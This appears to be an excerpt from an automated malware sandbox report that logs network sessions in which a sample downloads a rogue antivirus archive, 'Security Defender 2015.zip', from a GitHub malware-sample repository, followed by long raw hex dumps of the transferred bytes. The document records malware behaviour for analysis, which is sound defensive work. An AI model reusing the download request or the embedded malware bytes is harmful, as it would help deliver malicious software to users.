                                                                                                                                                    2022-09-29 12:59:22 UTC32060INData Raw: a2 04 26 0d 3f 4e 90 8a b1 ab c4 be b2 db 2c 3c c1 17 5a ea 37 79 4a 1b c7 a1 a6 86 3d 6c 96 26 32 db 76 9a d3 03 48 39 f5 91 b4 21 e6 b9 d1 2d 27 60 35 f4 5a 77 17 5f 78 f8 20 2c c1 87 da f7 3d 81 fa 84 3c c3 bc 40 8b fe 10 b5 03 9c 63 a2 a8 4c 28 eb 37 56 72 e8 ba 6d 30 44 f7 20 52 ec f9 70 ef c7 bf 35 64 26 8a 61 56 29 f5 64 bb d5 76 e5 cb 39 99 b4 0b fb 39 5e 6f 9c 97 a2 1b 32 95 ba 0e c0 d1 5b e7 f1 81 b6 8e 76 58 10 f7 44 9f 20 c7 5b 15 27 84 11 40 86 e0 35 31 61 56 ff ce 31 85 32 eb f8 4c ac 47 cf 05 7d d3 18 e4 f6 e9 43 ca 28 b6 76 88 68 9b 91 c4 39 37 13 0d 73 c9 93 00 e1 f2 c4 52 f2 de 1d 87 48 36 bf cc bf c0 a0 f9 50 01 2b 0a 8e 63 8e d9 a8 6a 46 b8 6e d7 41 48 d7 d7 ef 83 2f ec e4 c0 72 40 fc d7 e9 8f 36 55 21 6c e3 80 a2 3c 83 35 74 cd 44 02
                                                                                                                                                    Data Ascii: &?N,<Z7yJ=l&2vH9!-'`5Zw_x ,=<@cL(7Vrm0D Rp5d&aV)dv99^o2[vXD ['@51aV12LG}C(vh97sRH6P+cjFnAH/r@6U!l<5tD
                                                                                                                                                    2022-09-29 12:59:22 UTC32076INData Raw: bf 1e 04 54 d7 6e 8b 24 ce 19 c6 f1 bf a3 01 0c 1e 23 5d fd c7 c1 be fc 5e 7e 94 c9 35 3f 38 6a 1e 27 8b 91 8b 16 ae b7 b6 c2 af bf 61 59 3c 27 c3 3f 2c 68 20 f1 5b c7 ee f6 0a 5b ab ba f0 96 83 7b ee f8 7a d2 4e 80 a9 e2 d1 a9 62 2f 08 c6 26 bd d1 8d ec f4 d8 a8 12 8b 58 5f 8b 0c e4 2e ef 99 cf 8d 64 e2 6d bd 37 1c 6e 2d 12 9e e9 86 73 f8 e6 78 85 f8 96 7d ef 4a 19 55 62 79 ca 2c fc d6 0a 24 2d a7 02 f5 0b d4 ea 0e e7 05 10 33 4a 45 ef 88 33 36 ef 60 2d 5b ca 89 04 bd 1d 3a 43 7d f0 5f 41 05 c3 79 ad 17 2e aa 0e 53 ed 5d 5b 36 70 e2 c5 fa b5 f5 e2 a8 dd ff ae 69 9c ed e8 e0 03 b0 78 a1 13 d0 fd 8e 86 9f 37 c0 6b e3 2f 80 22 af 54 ec d0 40 54 19 5c 9b 2a 28 fc bc 5f bf 51 73 a5 62 2e 1d b4 a5 b7 3e 33 92 c6 04 ba 4f fb 00 16 ca f5 bb 6c 5d a9 32 9c 55 cc
                                                                                                                                                    Data Ascii: Tn$#]^~5?8j'aY<'?,h [[{zNb/&X_.dm7n-sx}JUby,$-3JE36`-[:C}_Ay.S][6pix7k/"T@T\*(_Qsb.>3Ol]2U
                                                                                                                                                    2022-09-29 12:59:22 UTC32092INData Raw: 64 7a 60 e8 49 42 4d a1 16 87 2a 1b 04 aa 91 56 cc e2 4d ab 38 81 9a 11 8e 79 75 f2 d1 7e 45 db 25 f7 4c 42 5d f9 43 0c 1a 03 c7 9d 85 0b 72 35 0b 59 80 96 76 a7 c9 6b 64 52 25 d7 bd 5b 30 98 87 ba 82 a2 69 88 2a c7 17 19 77 9a 2a 87 e2 e3 f0 7b c1 6a 3c 60 d0 a3 73 c0 cd c5 6e f4 56 7c 00 f1 1f 27 3d 35 56 d7 28 79 bd 39 9f 2c 59 18 54 31 59 a2 96 85 2a 3f e8 56 3a 85 b4 23 76 4d 5a 65 b2 b7 f7 c5 78 1f 44 c5 ab a9 69 9e b9 07 b4 4d d9 f1 6f 03 16 d7 24 e3 88 48 04 bf ac 0b 4d f0 9f 41 1e 40 4f f3 c5 2e bc df b8 2c b4 9e 37 bd ca e8 74 7d e5 d8 52 75 fb 91 54 78 3f 7a 65 b5 8d 65 d9 9a 67 31 de 90 c1 54 ee bc a8 01 72 95 32 a7 d0 06 ed b7 ba 69 8f e3 93 b1 60 88 e8 39 59 4a a3 d1 27 de 3b 27 9b 65 6c 1e bc 84 59 83 e7 22 20 c9 87 06 a0 a4 55 ce 21 c4 10
                                                                                                                                                    Data Ascii: dz`IBM*VM8yu~E%LB]Cr5YvkdR%[0i*w*{j<`snV|'=5V(y9,YT1Y*?V:#vMZexDiMo$HMA@O.,7t}RuTx?zeeg1Tr2i`9YJ';'elY" U!


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    121192.168.2.349768140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:22 UTC32102OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    122140.82.121.3443192.168.2.349768C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:22 UTC32102INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:26 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:22 UTC32103INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    123192.168.2.349769185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:22 UTC32105OUTGET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    124185.199.108.133443192.168.2.349769C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:22 UTC32105INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 470947
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "1119843b6af6d35fb9a350e92c8c020a400ec45ae6f14abd60e6e3e267b6af12"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0805:8530:1072606:116E222:63359363
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:22 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6946-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456363.648406,VS0,VE168
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 22048f9188c212d0f1e7c030fb1d1bffcb4e04ab
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:22 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:22 UTC32106INData Raw: 50 4b 03 04 14 00 01 00 08 00 d8 8d 30 47 ec 96 77 b6 d9 2e 07 00 00 32 13 00 22 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 44 65 66 65 6e 65 72 32 30 31 35 2e 65 78 65 fc a2 85 cd 48 a8 cb 5b ea 52 b4 a7 55 07 e0 72 50 f2 9a 8f 26 cf dd b3 13 0e d4 da 9e fd d9 33 85 ab dc de ef 39 35 f9 9d a8 56 76 a8 e6 14 24 bb 5a a2 7b c3 1e 12 24 db b0 eb 28 23 7d e7 ae b5 ae 9e 7d 59 25 c6 0e aa 95 06 2a ad c0 dd 82 09 0c 35 62 8a 02 2f 79 fb 8e f8 56 c2 f2 b2 4b 17 5c 4b 2b 94 0d 50 b1 86 40 bf ad 94 cc e9 94 5b 86 01 e3 6b 41 67 a4 f0 10 e6 56 74 76 36 81 f9 09 01 b3 40 1e cd 86 4d fc 63 49 0b e0 b1 b7 27 f6 66 dd 48 4a d2 a5 78 e9 08 76 ca a5 0e 8e 40 43 ec f2 09 1e 88 7a f5 0e 20 0e 5d 9e 50 b9 5e f1 00 46 79 00 14 85 11 04 8f b2 26 51 c4
                                                                                                                                                    Data Ascii: PK0Gw.2"Endermanch@SecurityDefener2015.exeH[RUrP&395Vv$Z{$(#}}Y%*5b/yVK\K+P@[kAgVtv6@McI'fHJxv@Cz ]P^Fy&Q
                                                                                                                                                    2022-09-29 12:59:22 UTC32122INData Raw: 43 2f 43 b1 b2 f0 28 97 6c 9f cc 60 fc 22 b1 15 f7 9a 4a 26 b1 7d 47 76 18 f4 ec 36 7f 0d 03 d8 e0 82 25 3f 9b 6a 27 0d 2f b3 8b fd 38 15 3c e2 45 3a 24 58 63 9f 23 67 7b b5 19 dd f7 a5 a9 d8 d1 98 c2 23 be 6f 50 72 6e 91 5c b5 57 21 86 fa 81 e8 72 da 3e 17 e1 a8 dc 27 9c cf 6f 30 ea 45 9a 01 ea 91 72 50 24 e0 2f b4 6f d9 5c 81 9b 4d a8 b3 7a c2 90 9d ac d2 11 32 7e 25 d3 75 12 31 5b bd 81 29 1e 07 9c 79 52 a5 d2 25 d0 b0 42 93 e9 ce da a0 0a 29 d3 d7 d7 e6 fe 57 25 58 12 af 42 59 58 6f 18 a4 df f0 92 fb 84 4c 95 1a 9b 32 1f e1 66 59 10 13 9e b9 ea 3a 4b 2e f9 6f c4 e5 7d 66 12 51 78 69 4e cf e0 c6 a5 f8 94 37 b9 06 42 db 9e fc 56 98 04 28 85 d8 ff 61 a8 3e 8d 57 60 12 90 c8 d7 8e 77 a2 4e c5 43 48 3a 6d a3 fe cb e1 1d 35 c6 95 c9 3c 8a 82 c2 28 52 3b d9
                                                                                                                                                    Data Ascii: C/C(l`"J&}Gv6%?j'/8<E:$Xc#g{#oPrn\W!r>'o0ErP$/o\Mz2~%u1[)yR%B)W%XBYXoL2fY:K.o}fQxiN7BV(a>W`wNCH:m5<(R;
                                                                                                                                                    2022-09-29 12:59:22 UTC32138INData Raw: 56 41 8f fd a7 3f 09 f8 c4 45 60 2c 4d 3e 0e 02 a0 c1 c3 68 aa 59 28 31 53 f2 6f 63 0b b2 85 2d bd 9f a4 14 63 af e4 ff fc ad 29 30 ee a4 2f 4a 40 c9 cb 22 45 79 10 c3 62 b7 01 67 2a ac 90 ad b1 82 b2 3c be ec e3 89 78 b2 cd 55 25 e2 a5 ba b1 1e b9 c3 f1 fb 42 38 74 3f 6b 09 68 fd ba be ef 6b c3 97 65 90 28 b3 fc 17 94 87 f3 69 01 c9 41 2b c0 6c 88 e0 f5 91 9c 4d 7e f7 9d 83 3a 21 1a 56 06 5c 67 61 d9 da 9c fa b0 76 d4 c5 ec 5c 1a 2d 98 c3 47 36 2b a5 38 51 66 ef d9 47 a2 1d eb 90 13 5a 4e 6e c1 fc 1e dc 89 8d ed 51 be 3e c2 1f 25 f8 5d d8 7f bd 59 a1 11 e5 62 07 2b 37 f4 ac 04 03 9b e5 92 52 db 8f 88 78 68 57 7d 7a 0b 3a 8f 25 28 88 e4 d4 b0 3a 28 d4 a9 ba 92 92 8a 30 07 05 b6 a7 41 a9 93 26 bb 9a ab 95 68 01 89 e4 7f b3 64 c8 9c ce 40 21 a1 26 d8 8e b9
                                                                                                                                                    Data Ascii: VA?E`,M>hY(1Soc-c)0/J@"Eybg*<xU%B8t?khke(iA+lM~:!V\gav\-G6+8QfGZNnQ>%]Yb+7RxhW}z:%(:(0A&hd@!&
                                                                                                                                                    2022-09-29 12:59:22 UTC32154INData Raw: a6 9d bb c3 01 5a 07 9c 7b 21 c1 4c 48 4a 64 64 ff 71 ab 0f 21 43 44 13 e7 4a c1 d6 8f 4a d2 98 ab 9c 22 af d9 dd b3 1d f6 45 e8 f0 6e 7b e4 90 34 87 49 90 94 07 ca a1 5d 62 f2 87 07 58 c2 db d7 8c 97 cf a7 f7 b0 35 09 96 7e c6 4f dc c2 88 76 ed a5 27 35 31 73 7c e7 d7 f3 17 76 9f 0c 3f a8 65 ea cd c7 ae 13 dd 54 95 e3 07 b5 b3 f8 65 9e fb c9 dd c2 91 73 c3 16 e8 56 d4 d1 a1 d4 b9 8b 49 54 1b ce 29 d4 b0 ee 12 8d 34 96 b7 ac 04 04 89 bf 0d f1 7f 24 85 81 6e 14 9e 58 18 7f d3 d1 bf 91 43 b2 a7 6b 66 01 5c 09 bb eb dd 01 b4 cd a6 63 f5 8d 5c b1 00 40 88 77 ee 1f f2 85 e3 90 c5 5e 11 57 f8 67 46 dc 29 d9 26 d5 17 67 bc 4b 20 f3 7a a9 dd cd 22 8c d6 af d5 ac 0d ba 80 a7 af 81 14 94 a0 1b ea c1 be b4 bb 5d 12 e4 b6 52 90 bc 70 f6 2d c4 d8 62 f2 c4 df 43 13 f8
                                                                                                                                                    Data Ascii: Z{!LHJddq!CDJJ"En{4I]bX5~Ov'51s|v?eTesVIT)4$nXCkf\c\@w^WgF)&gK z"]Rp-bC
                                                                                                                                                    2022-09-29 12:59:22 UTC32170INData Raw: 2f b7 87 2d 80 7f 1f e2 a6 ee 75 5e 3d 1f f2 1f 52 10 b8 08 e5 ea f3 f8 5a 78 86 2e 20 22 e2 fe 8b 20 f4 d6 5c d7 71 e4 1b f8 0b ba 6c 58 cd af f9 69 1c 08 9b ee 6e 17 4b 30 b4 3e a8 97 ab 3e d5 47 13 4f 3d b0 02 47 96 f8 bc ac 65 f3 db 7b 82 fe f9 3a 42 be 32 38 60 eb 2e c6 4b 73 2a f1 fa fd 05 c4 2f 87 44 d7 a3 8a 28 73 a2 e8 63 79 ee 5f 87 9a ba 73 60 2f 84 39 b6 ba 86 72 93 44 1a c2 c4 7b 76 0b d4 f4 46 22 8a a6 bb 30 b9 72 0a c4 d4 3e a7 15 ef 2c 5d 35 86 57 e9 a5 ee 5c 75 c1 a6 ce 19 ba c1 93 e3 fc f5 41 59 0e a9 12 20 f0 9b 0d f8 c4 a7 0c 52 62 bf 3c cb 5e 5e 14 b8 2d f7 c7 02 5e d1 ac 68 ae 6a e1 fb 9b a4 9f 5c 6b e5 36 af 2a 25 37 a1 28 18 88 b9 5d dd 97 56 29 15 4d db ab 03 1f 83 51 bb a4 19 4f 41 50 25 e0 83 3b d3 38 e2 3c 21 89 32 f7 a2 9d 6a
                                                                                                                                                    Data Ascii: /-u^=RZx. " \qlXinK0>>GO=Ge{:B28`.Ks*/D(scy_s`/9rD{vF"0r>,]5W\uAY Rb<^^-^hj\k6*%7(]V)MQOAP%;8<!2j
                                                                                                                                                    2022-09-29 12:59:22 UTC32186INData Raw: fc 74 81 7c e6 fa 94 4b be cd 6e 3c ce 00 12 ca 00 a6 25 17 a7 d3 f7 11 a3 06 8f cf bc e3 3b 72 bf 4c 97 b6 6e 72 7d db 8a 8a 1d 21 ff 94 4a 6a 7b f6 fc a3 1b 4f 8a 66 9e 79 84 f3 f2 ce a6 42 25 48 db ca bd 61 2b 03 9c 85 8d 4d e0 a4 53 55 2c 36 0f bc 0d 3f 19 8f 35 be 39 db 1d c5 88 95 c7 3e ed fd db 1c c8 db cd 40 3a 0a 26 51 d8 8e 2e 8e b4 c8 ec d1 3c 8d ac d8 97 49 84 51 29 ea b4 04 1b 0c b5 8a 45 8a 2e bd d6 2d a3 d7 4a c3 d4 7b 81 31 95 c8 2f 2f ba 41 de 8a ac f9 a4 23 66 a4 75 6c 08 57 b6 0d a6 d6 cf 50 e2 d7 dd de 7a 06 35 e8 73 0a 54 20 3d f9 da db fb a0 72 4a 62 8c a4 96 66 f4 b1 ab ac 3c 3f e2 d4 6b 28 be fb 42 66 19 5f 69 14 1a b8 3c 46 8c 46 d1 69 17 c8 19 64 32 87 56 f8 a6 0e cd fc e1 92 34 1a 47 93 66 44 9c 47 47 d3 51 17 d3 6e fe c9 59 2e
                                                                                                                                                    Data Ascii: t|Kn<%;rLnr}!Jj{OfyB%Ha+MSU,6?59>@:&Q.<IQ)E.-J{1//A#fulWPz5sT =rJbf<?k(Bf_i<FFid2V4GfDGGQnY.
                                                                                                                                                    2022-09-29 12:59:22 UTC32202INData Raw: 10 00 21 7d d0 68 19 7b 08 43 ed 40 3d b2 28 6a fe 4c 09 b8 f8 62 73 a1 09 c9 b9 25 f1 9f 52 2b f8 0f 54 3a ba e4 98 07 1d a6 af fe 9f f6 75 3c db 66 35 ff 48 f2 29 d1 fe 0c d1 cb 2e bc c6 53 99 79 bd 1e fb 37 03 94 6d ec 66 ea 1f 5f cd c7 43 2b cb 2a b2 89 fc da 46 ff 95 00 b8 5b db d8 d6 fa 50 70 fe 93 ca 3d 80 06 bb 56 62 0d b4 92 74 13 55 97 72 d9 8b cf 36 d2 2f 55 ec 43 6d 13 2c c5 c6 71 e6 1a 6c 5a 5e ba e7 e9 9d 89 d5 25 1a 16 6b 38 20 bf 87 f6 2c 51 55 b9 d8 50 8d 60 1d ba 2f ab e0 ff 05 9d ac 4d c0 9d fd b6 49 0d 2f 8b e8 3f 64 4c ea fa 2d ea 9f 41 e9 fb 6c d6 c7 25 a4 e0 5b 2b 4c 89 33 5a 7d 08 53 c9 3c 57 78 28 46 9d b3 c8 d4 03 d5 19 f9 f2 a2 cd a5 ce 65 dc 41 03 ad 56 57 40 02 f1 72 2a 39 f2 2e 4c 3c 1e 00 bd 11 43 a3 cd d5 86 a1 ce 23 bb 74
                                                                                                                                                    Data Ascii: !}h{C@=(jLbs%R+T:u<f5H).Sy7mf_C+*F[Pp=VbtUr6/UCm,qlZ^%k8 ,QUP`/MI/?dL-Al%[+L3Z}S<Wx(FeAVW@r*9.L<C#t
                                                                                                                                                    2022-09-29 12:59:22 UTC32218INData Raw: f0 08 fd 87 c2 1b 29 09 89 74 d9 68 34 b6 b2 94 33 db 19 f2 8e 2e d8 8e 35 2b d5 48 e1 41 96 44 ee a3 10 92 a8 22 39 c4 62 60 e2 40 26 8a 50 26 67 43 e5 c7 72 27 d1 16 17 aa 2e 3b 9c 33 f7 f9 fa 1c 62 ee b4 c4 3f 33 7f dd 3b 3d d1 ac c7 05 56 e4 1f 26 31 e7 62 65 9d 48 1e 4b 74 58 f5 7e c1 ad 57 e2 79 65 ae e8 a4 c1 f0 29 02 fe 9f e0 ac 59 2b 4d 55 ba 48 0c 29 86 4b 25 e4 d1 14 ea 84 9f 5c ef dd 43 7b b0 8a ec 9f ab 28 d1 c5 38 fb 29 e8 44 a1 24 10 53 6d e3 e7 6c c8 18 2a d2 43 46 d5 c6 c3 39 e2 e1 65 01 25 87 78 80 60 66 6c 56 82 28 00 8a 8e 59 38 55 f8 40 64 20 ca 10 dc 17 a7 44 a4 7b b2 0d ea 8d 79 c3 cb c8 3d 11 2b 32 bf 9b bd eb 30 b7 90 35 b7 3e d3 83 e3 a9 14 e8 c3 e7 3f 40 cf 9e 28 0b 66 6e d6 7e 84 59 66 3c a2 13 8c 15 84 7a 6e 0d e3 f8 82 fb 2f
                                                                                                                                                    Data Ascii: )th43.5+HAD"9b`@&P&gCr'.;3b?3;=V&1beHKtX~Wye)Y+MUH)K%\C{(8)D$Sml*CF9e%x`flV(Y8U@d D{y=+205>?@(fn~Yf<zn/
                                                                                                                                                    2022-09-29 12:59:22 UTC32234INData Raw: f3 c8 8a 59 1f 5e 2e 0b 68 2e 05 d8 2c 0a db db d6 97 43 24 a2 cf d2 52 5b 30 cc 30 72 87 c9 2e 80 cb d5 28 60 3d 96 16 64 dd 29 d7 f9 ca 84 d8 7e 2d 88 ac 57 fe 29 d3 c4 aa f5 66 d8 af f1 65 3f 65 e9 2b 9d 42 8c b1 09 e7 18 eb c0 23 8b 7e 4b 75 6a a4 4b e2 1c 79 5f 13 92 ea 2d 37 d9 e3 7a ed 30 2c 47 77 fa 04 a7 29 72 36 b2 52 e9 0c 72 a4 c7 bc 57 29 31 1d a8 b5 31 14 80 e7 4c 2d 17 4a f8 16 6f eb ef 00 60 49 5f c6 f7 a1 9a 6b f9 61 a4 8c 78 fb 1b c6 17 0d df 78 ee e2 c0 18 75 6a 26 f6 d9 00 3b 67 ba 2e 16 ca d5 5d 53 90 a5 17 9b 8a c6 6f a7 db d6 d8 fa 86 9a 19 28 a4 30 f1 3a cd 74 5f ef d7 e6 c5 7a a2 47 41 9b 26 e2 1f cb 8b cd cd 60 89 3b 2e 0a 0c 5a 67 ba dc a0 d0 d5 4d bb e3 c4 80 cc 52 54 c2 b1 5e 47 6a ea 8f c3 55 3b 2c 64 78 b9 fd 86 4a 57 72 3e
                                                                                                                                                    Data Ascii: Y^.h.,C$R[00r.(`=d)~-W)fe?e+B#~KujKy_-7z0,Gw)r6RrW)11L-Jo`I_kaxxuj&;g.]So(0:t_zGA&`;.ZgMRT^GjU;,dxJWr>
                                                                                                                                                    2022-09-29 12:59:22 UTC32250INData Raw: ad 33 e9 7e d5 f3 78 65 af 31 05 00 72 0d 05 78 8e 4e 39 23 25 6c cd 30 5f ad 1f 52 29 1e 4e 7f 05 33 f3 5d 06 e1 53 5b 29 95 4f 29 ed 68 9f f1 03 6b 2f 8c cb 2a 24 7b 74 a2 fc 5d 0b b9 6d 45 07 a8 a8 b0 6d d7 60 e0 f5 40 63 85 58 6d 37 01 83 f0 ed 93 cc 09 de bc bb 57 7c f7 34 27 cb 20 b9 14 ff fb a9 28 62 1c d5 e3 9b 6a e5 09 f5 1f 81 47 c3 54 8d 46 f9 33 20 02 ec 6b 29 44 a7 48 a6 56 83 02 c9 da 55 17 cc bd 03 e8 5f e2 53 dc 92 78 82 ca cc df b7 3e 00 5a 20 93 88 9b 6d 30 33 79 46 29 a9 d6 b2 30 fb 15 aa 01 5b 8d a8 96 c9 7f a1 48 93 6e b7 ce 7c 5b e4 2d 8f f2 16 1e b0 70 18 c9 f8 66 82 8e 11 27 57 e0 86 ed 88 49 eb ec 8f 7c bf e6 7b b2 f1 8e e2 02 b2 4e ee 86 12 e1 81 6a 51 67 ce a3 c9 81 db 8e 91 df fe 78 8b 8c 0d 0f f8 c8 14 c2 0c 6f 51 44 8b 49 a0
                                                                                                                                                    Data Ascii: 3~xe1rxN9#%l0_R)N3]S[)O)hk/*${t]mEm`@cXm7W|4' (bjGTF3 k)DHVU_Sx>Z m03yF)0[Hn|[-pf'WI|{NjQgxoQDI
                                                                                                                                                    2022-09-29 12:59:22 UTC32266INData Raw: af ab 80 da 99 0d 6e 4f 0f 1d 2c 60 6f 30 b8 22 d9 06 5d 5d 20 cd eb 8c 8e 64 ed d6 59 c4 6c 41 ef f9 f5 1f 9a c7 89 aa 3f 9e 16 c6 84 d4 2f c1 1c b5 bb 8b e7 90 a5 c7 94 96 53 2b 6f 4e 3d 25 ba dc 59 c9 c8 38 ae 83 bb 40 4e b1 b0 55 4d da 8f 34 e5 2d 76 f3 f2 20 20 e7 9d e1 aa 3b 5d 7b 5b 1f 55 e1 c9 5e 4d b6 4a 1d 1c c9 47 11 7f 51 80 57 c6 b1 32 0d 0e c0 3c f8 ac 1e bb 3c e1 32 33 3b 52 b3 a6 30 e6 c9 69 02 0c 7d 7e 8c 2e 02 7c 3a e8 34 86 49 49 68 bd 01 6a e2 80 87 47 ff 9f e5 de ab 08 1b c0 87 28 b9 d3 70 22 a7 3b 9f a3 c2 26 44 78 21 72 db 69 11 45 94 fe d2 2b f0 3a 7d 4d 41 78 d7 ad 35 c5 95 7f fe f2 f4 7a 36 87 96 67 4a da da 08 79 37 1e fb e1 77 9a d5 62 c8 94 ed 33 db f7 9c ad 6f cb 6a 5b a9 a8 2a 81 e4 6f e2 8d f9 1d ed a1 e1 ac 76 8f 56 6f 25
                                                                                                                                                    Data Ascii: nO,`o0"]] dYlA?/S+oN=%Y8@NUM4-v ;]{[U^MJGQW2<<23;R0i}~.|:4IIhjG(p";&Dx!riE+:}MAx5z6gJy7wb3oj[*ovVo%
                                                                                                                                                    2022-09-29 12:59:22 UTC32282INData Raw: ca 40 9b 38 0f 3c df 6f 00 a7 ad 0d d4 82 21 43 bd ba f8 20 f3 51 45 b7 19 0b 8e 30 6c 94 e1 0b 62 ee df a3 ae 69 d3 c5 17 49 bf 7c 2d ce dd d2 ef b8 be a1 c8 c3 2e 34 60 f3 f2 71 e2 7d 11 1f dc 94 0f b9 f5 d2 06 13 92 b4 a0 2d e0 d2 25 55 17 1f 19 3e c3 2f cd a1 d1 9e e5 7f 74 c6 d7 fa 01 f0 ee 99 dc 0e 15 7c 58 1b 74 f8 ce 0d bc 15 22 4a 87 5b d0 a1 9a 1b b7 bf 24 4e 86 fd 55 50 4a 33 a4 aa ee 74 b9 a9 15 6d a1 8f 3b ce b8 28 b9 45 7b a2 fb 44 12 94 b5 22 25 17 97 c0 1f 0a 79 8b f9 ed 87 52 bc 50 62 74 9d b7 02 e2 d6 22 24 19 63 fe 36 6e 55 a4 9a 91 a2 33 02 b8 05 2f 79 b0 8b a7 50 87 ed 99 92 5e 14 6c 14 93 d0 01 0d 42 1c 77 af bd e4 69 1d af 2c ba 44 c5 af ca f9 8a 5c eb 4c 35 74 fe 3c 28 bf 17 16 06 24 32 0a fd 2a bb 19 99 9b d8 b4 4b 85 1b 16 1d d4
                                                                                                                                                    Data Ascii: @8<o!C QE0lbiI|-.4`q}-%U>/t|Xt"J[$NUPJ3tm;(E{D"%yRPbt"$c6nU3/yP^lBwi,D\L5t<($2*K
                                                                                                                                                    2022-09-29 12:59:22 UTC32298INData Raw: 64 b7 44 84 07 d9 2c 7e 90 d5 c1 a4 2d 2c 21 1a 53 00 45 82 ce d8 3b 30 64 40 c3 c7 09 64 f5 24 fe 17 a2 96 ad 53 39 dd 44 fb 2d 9c e9 11 2d 22 f3 fc 5c 56 12 97 1b 97 a4 e8 c5 8f 8c 79 8c 23 bf 77 6c 5e c0 71 cc 66 4b 35 45 79 31 a6 6d fc 2f 90 2c be c9 1d 89 2b eb 78 eb 60 f5 e5 8f 1e 85 de 38 a5 7e 50 44 f5 ad 10 9a 69 b5 72 3d dc 71 ca ea b8 60 3e ea d4 36 3e 30 ff 8a 53 c7 5b 7c ae b2 00 b3 f9 9f 3f cc 57 a5 2c fc 57 c2 7e 92 c5 2a 3f 6c 7c ed b8 19 2c a3 7d 6c 1a 0a 1c 3e 34 66 ab 03 0b 33 ba 52 5a 91 b8 b8 80 83 64 3b 63 c9 a7 c5 f0 4f f8 d4 dd db 51 6d 57 6a fa 23 73 71 ed c1 b0 8e 41 5f ab 52 2d d4 78 24 bd 93 f2 2e 80 31 82 f8 f5 c0 c2 6d 9f 98 7a 60 a9 31 55 5a 93 19 7b 53 61 2c b7 37 e4 fb 9b 28 3f 45 a6 e3 6d 06 29 96 e8 c7 8c 9d 49 e4 d5 f5
